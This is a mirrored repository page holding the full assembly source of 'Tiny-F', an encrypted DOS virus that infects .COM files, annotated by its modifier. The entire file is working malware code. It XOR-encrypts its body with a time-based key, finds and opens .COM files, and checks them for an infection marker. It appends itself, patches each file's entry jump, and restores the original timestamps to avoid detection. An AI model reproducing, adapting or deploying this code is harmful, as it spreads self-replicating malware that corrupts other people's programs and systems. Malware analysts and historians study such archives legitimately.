mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-30 15:05:27 +00:00
183 lines
7.5 KiB
NASM
183 lines
7.5 KiB
NASM
|
tinyv SEGMENT BYTE PUBLIC 'code'
|
|||
|
ASSUME CS:tinyv, DS:tinyv, SS:tinyv, ES:tinyv
|
|||
|
|
|||
|
ORG 100h
|
|||
|
|
|||
|
DOS EQU 21h
|
|||
|
|
|||
|
start: JMP pgstart
|
|||
|
exlbl: db 0CDh, 20h, 7, 8, 9
|
|||
|
pgstart:CALL tinyvir
|
|||
|
tinyvir:
|
|||
|
POP SI ; get SI for storage
|
|||
|
SUB SI,offset tinyvir ; reset SI to virus start
|
|||
|
MOV BP,[SI+blnkdat] ; store SI in BP for return
|
|||
|
ADD BP, OFFSET exlbl
|
|||
|
CALL endecrpt
|
|||
|
JMP SHORT realprog
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; nonencrypted subroutines start here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
; PCM's encryption was stupid, mine is better - Dark Angel
|
|||
|
endecrpt:
|
|||
|
; Only need to save necessary registers - Dark Angel
|
|||
|
PUSH AX ; store registers
|
|||
|
PUSH BX
|
|||
|
PUSH CX
|
|||
|
PUSH SI
|
|||
|
; New, better, more compact encryption engine
|
|||
|
MOV BX, [SI+EN_VAL]
|
|||
|
ADD SI, offset realprog
|
|||
|
MOV CX, endenc - realprog
|
|||
|
SHR CX, 1
|
|||
|
JNC start_encryption
|
|||
|
DEC SI
|
|||
|
start_encryption:
|
|||
|
MOV DI, SI
|
|||
|
encloop:
|
|||
|
LODSW ; DS:[SI] -> AX
|
|||
|
XOR AX, BX
|
|||
|
STOSW
|
|||
|
LOOP encloop
|
|||
|
|
|||
|
POP SI ; restore registers
|
|||
|
POP CX
|
|||
|
POP BX
|
|||
|
POP AX
|
|||
|
RET
|
|||
|
;-----end of encryption routine
|
|||
|
nfect:
|
|||
|
CALL endecrpt
|
|||
|
MOV [SI+offset endprog+3],AX; point to data
|
|||
|
MOV AH,40H ; write instruction
|
|||
|
LEA DX,[SI+0105H] ; write buffer loc |
|
|||
|
MOV CX,offset endprog-105h ; (size of virus) --\|/--
|
|||
|
INT DOS ; do it!
|
|||
|
PUSHF
|
|||
|
CALL endecrpt
|
|||
|
POPF
|
|||
|
JC outa1 ; error, bug out
|
|||
|
RET
|
|||
|
outa1:
|
|||
|
JMP exit
|
|||
|
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; Unencrypted routines end here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
realprog:
|
|||
|
CLD ; forward direction for string ops
|
|||
|
; Why save DTA? This part killed. Saves quite a few bytes. Dark Angel
|
|||
|
; Instead, set DTA to SI+ENDPROG+131h
|
|||
|
MOV AH, 1Ah ; Set DTA
|
|||
|
LEA DX, [SI+ENDPROG+131h] ; to DS:DX
|
|||
|
INT 21h
|
|||
|
|
|||
|
LEA DX,[SI+fspec] ; get filespec (*.COM)
|
|||
|
XOR CX, CX ; || (clear regs)
|
|||
|
MOV AH,4EH ; || (find files)
|
|||
|
mainloop: ; \||/
|
|||
|
INT DOS ; ----\/----
|
|||
|
JC hiccup ; no more files found, terminate virus
|
|||
|
; Next part had to be changed to account for new DTA address - Dark Angel
|
|||
|
LEA DX, [SI+ENDPROG+131h+30]; set file name pointer
|
|||
|
; (offset 30 is DTA filename start)
|
|||
|
MOV AX,3D02H ; open file
|
|||
|
INT DOS ; do it!
|
|||
|
MOV BX,AX ; move file handle to BX
|
|||
|
MOV AH,3FH ; read file
|
|||
|
LEA DX,[SI+endprog] ; load end of program (as buffer pntr)
|
|||
|
MOV DI,DX ; set Dest Index to area for buffer
|
|||
|
MOV CX,0003H ; read 3 bytes
|
|||
|
INT DOS ; do it!
|
|||
|
CMP BYTE PTR [DI],0E9H ; check for JMP at start
|
|||
|
JE infect ; If begins w/JMP, Infect
|
|||
|
nextfile:
|
|||
|
MOV AH,4FH ; set int 21 to find next file
|
|||
|
JMP mainloop ; next file, do it!
|
|||
|
hiccup: JMP exit
|
|||
|
infect:
|
|||
|
MOV AX,5700h ; get date function
|
|||
|
INT DOS ; do it!
|
|||
|
PUSH DX ; store date + time
|
|||
|
PUSH CX
|
|||
|
MOV DX,[DI+01H] ; set # of bytes to move
|
|||
|
MOV [SI+blnkdat],DX ; " " " " " "
|
|||
|
; Tighter Code here - Dark Angel
|
|||
|
XOR CX,CX ; " " " " " " (0 here)
|
|||
|
MOV AX,4200H ; move file
|
|||
|
INT DOS ; do it!
|
|||
|
MOV DX,DI ; set dest index to area for buffer
|
|||
|
MOV CX,0002H ; two bytes
|
|||
|
MOV AH,3FH ; read file
|
|||
|
INT DOS ; do it!
|
|||
|
CMP WORD PTR [DI],0807H ; check for infection
|
|||
|
JE nextfile ; next file if infected
|
|||
|
getaval: ; encryption routine starts here
|
|||
|
; My modifications here - Dark Angel
|
|||
|
MOV AH, 2Ch ; DOS get TIME function
|
|||
|
INT DOS ; do it!
|
|||
|
OR DX, DX ; Is it 0?
|
|||
|
JE getaval ; yeah, try again
|
|||
|
MOV word ptr [si+offset en_val], DX ; Store it
|
|||
|
; Tighter code here - Dark Angel
|
|||
|
XOR DX,DX ; clear regs
|
|||
|
XOR CX,CX ; " "
|
|||
|
MOV AX,4202H ; move file pointer
|
|||
|
INT DOS ; do it!
|
|||
|
OR DX,DX ; new pointer location 0?
|
|||
|
JNE nextfile ; if no then next file
|
|||
|
CMP AH,0FEH ; new pointer loc too high?
|
|||
|
JNC nextfile ; yes, try again
|
|||
|
CALL nfect
|
|||
|
MOV AX,4200H ; move pointer
|
|||
|
XOR CX, CX ; clear reg
|
|||
|
MOV DX,OFFSET 00001 ; where to set pointer
|
|||
|
INT DOS ; do it!
|
|||
|
MOV AH,40H ; write to file
|
|||
|
LEA DX,[SI+offset endprog+3]; write data at SI+BUFFER
|
|||
|
MOV CX,0002H ; two bytes (the JMP)
|
|||
|
INT DOS ; do it!
|
|||
|
MOV AX,5701h ; store date
|
|||
|
POP CX ; restore time
|
|||
|
POP DX ; restore date
|
|||
|
INT DOS ; do it!
|
|||
|
exit:
|
|||
|
MOV AH,3EH ; close file
|
|||
|
INT DOS ; do it!
|
|||
|
|
|||
|
; Return DTA to old position - Dark Angel
|
|||
|
|
|||
|
MOV AH, 1Ah ; Set DTA
|
|||
|
MOV DX, 80h ; to PSP DTA
|
|||
|
INT 21h
|
|||
|
|
|||
|
JMP BP
|
|||
|
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; encrypted data goes here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
fspec LABEL WORD
|
|||
|
DB '*.COM',0
|
|||
|
nondata DB 'Tiny-F version 1.1' ; Program identification
|
|||
|
DB '<15><><EFBFBD>@&<><EEB7B3>' ; author identification
|
|||
|
DB 'Released 10-19-91' ; release date
|
|||
|
endenc LABEL BYTE ; end of encryption zone
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
; nonencrypted data goes anywhere after here
|
|||
|
;-----------------------------------------------------------------------------
|
|||
|
|
|||
|
blnkdat LABEL WORD
|
|||
|
DW 0000H
|
|||
|
|
|||
|
; Only en_val is needed now because of new encryption mechanism
|
|||
|
en_val DW 0h
|
|||
|
|
|||
|
endprog LABEL WORD
|
|||
|
tinyv ENDS
|
|||
|
END start
|
|||
|
|